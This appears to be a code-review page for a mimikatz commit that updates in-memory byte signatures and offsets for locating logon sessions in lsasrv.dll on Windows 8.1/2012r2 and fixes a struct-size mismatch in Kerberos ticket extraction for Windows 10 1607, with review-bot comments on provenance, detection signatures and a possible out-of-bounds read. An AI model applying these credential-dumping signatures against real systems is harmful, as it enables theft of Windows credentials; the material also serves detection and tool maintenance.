[fix #65] mimikatz sekurlsa::* for old 2012r2 version
[fix #66] mimikatz sekurlsa::kerberos CSP/Pin data for Windows 10 1607
parent
3ea0f0d11f
commit
57f4101567
|
@ -32,7 +32,7 @@
|
||||||
#define MIMIKATZ_VERSION L"2.1"
|
#define MIMIKATZ_VERSION L"2.1"
|
||||||
#define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
|
#define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
|
||||||
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
|
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
|
||||||
#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\" - CQURE Edition"
|
#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
|
||||||
#define MIMIKATZ_SPECIAL L" "
|
#define MIMIKATZ_SPECIAL L" "
|
||||||
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
|
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
|
||||||
#define MIMIKATZ_DRIVER L"mimidrv"
|
#define MIMIKATZ_DRIVER L"mimidrv"
|
||||||
|
|
|
@ -9,7 +9,7 @@
|
||||||
BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8};
|
BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8};
|
||||||
BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84};
|
BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84};
|
||||||
BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84};
|
BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84};
|
||||||
BYTE PTRN_WN63_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xfb, 0x45, 0x85, 0xc0, 0x74};
|
BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05};
|
||||||
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||||
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
||||||
|
@ -17,7 +17,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}},
|
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}},
|
||||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}},
|
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}},
|
||||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
||||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {24, -4}},
|
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}},
|
||||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
||||||
};
|
};
|
||||||
#elif defined _M_IX86
|
#elif defined _M_IX86
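Review bot: The replacement bytes for `PTRN_WN63_LogonSessionList` and the new offset pair `{36, -6}` in the `KULL_M_WIN_BUILD_BLUE` row are a matched set, but nothing in either hunk records which lsasrv.dll build they were taken from or what the two offsets point at. Because the previous pattern is replaced rather than kept alongside, a reader cannot tell from the diff which 8.1/2012r2 builds the row is still expected to match. A comment next to the pattern, for example `/* WN63: pattern and offsets taken from lsasrv.dll <build - placeholder> */`, would make that checkable. On the detection side, byte-signature rules keyed on the old WN63 sequence will presumably stop matching binaries built from this commit onward and need the new sequence added. The `LsaSrvReferences` initializer begins before the first hunk and spans both.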
|
||||||
|
|
|
@ -292,7 +292,7 @@ const KERB_INFOS kerbHelper[] = {
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
|
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
|
||||||
},
|
},
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
|
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
|
||||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
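Review bot: The corrected `kerbHelper` row still spells the session struct name by hand in every field, which is how `sizeof(KIWI_KERBEROS_LOGON_SESSION_10)` ended up beside `FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, ...)` entries in the first place. If that size bounds the copy of the session structure (the consumer is not visible here) and the `_10` struct is the smaller one, offsets such as `SmartcardInfos` could land outside the copied data. That would make the mismatch an out-of-bounds read in the tool and not only wrong output. A comment on the size field, `/* must be the same struct as the FIELD_OFFSET entries in this row */`, or a row macro that takes the struct type once, would keep the two from drifting apart again. The row itself begins before the hunk.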
|
||||||
|
|